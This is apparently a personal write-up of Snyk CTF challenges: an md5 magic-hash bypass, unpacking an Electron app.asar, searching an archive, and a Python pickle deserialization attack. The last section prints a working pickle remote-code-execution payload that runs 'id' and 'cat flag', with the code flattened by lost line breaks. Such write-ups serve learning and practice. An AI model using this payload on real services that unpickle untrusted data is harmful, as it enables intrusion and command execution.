Hello everyone , I hope you are doing well , On 5th October , Snyk CTF ran from 9:00 am — 7:00 pm ET , I didn’t really solve majority of challenges due to less time but the ones and I did will be sharing with you. The whole CTF was fun having majority of challenges as it was a jeopardy style CTF. For some of the challenges I wasn’t able to make writeups as the ctf was ended and the challenges weren’t up after the competition. So here are some challenges that I managed to make writeups of.
Magician (Web)
This web challenege had an input field where it was asking for us to input the string whose md5 hash will be equal to the given one meaning a hash collision where hashes of different file or string are similar
I tried to give some random text and in the bottom it should be the md5 hash of that string
But we need to put a string whose hash will be the same like this 0e365027561978452045683563242341 I tried to crack this md5hash using crackstation and hashcat but failed ,so I googled for this hash
So we just have to submit this string QNKCDZO and we will pass the condition
Electronbuzz (Misc)
In this challenge we were given an electron application in the form of windows,linux file , so I downloaded the debian package and extracted it , on which I app.asar file , which in electron holds the source code and some configuration file of the main application
We can extract this by using npx asar extract app.asar . , you can install npx using npm install -g asar
And we can get the flag by reading challenge.yml
Robert Louis Stevenson (Misc)
In this challenge we were given a tar file that on extracting we have some folders which also included archive file
Going into each directory and search for a file which may have something
And the flag was in one of the folders
Sauerkraut (Web)
This was a web challenege that had text form where we can submit text
On entering some text , it gave us an error about “invalid base64”
So after inputtting encoded text we get this
It then showed that “it could not find MARK” , I didn’t know what that meant so I just encoded that text
And when I submitted that , it showed me “pickle data was truncated”
Here I then goolged pickle , and found that it's a library or module that allows you to serliaze data , convert them into objects so that it can be passed for different process
And this lead me to exploiting to pickle in python , I found a resource where it showed RCE for pickle so this is the PoC that I found
import base64
import codecs
import pickleclass RCE(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['id'], ) )
class RCEStr(object):
def __reduce__(self):
return (codecs.decode, (RCE(), 'utf-8') )pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))
Perfect , we have found the we can do remote code execution , all that is left is to find the flag , so I ran ls command to see if there's a file we can read
import base64
import codecs
import pickleclass RCE(object):
def __reduce__(self):
import subprocess
return (subprocess.check_output, (['cat','flag'], ) )
class RCEStr(object):
def __reduce__(self):
return (codecs.decode, (RCE(), 'utf-8') )pickle_data = pickle.dumps({'name': RCEStr()})
payload = base64.urlsafe_b64encode(pickle_data)
print(payload.decode('utf-8'))
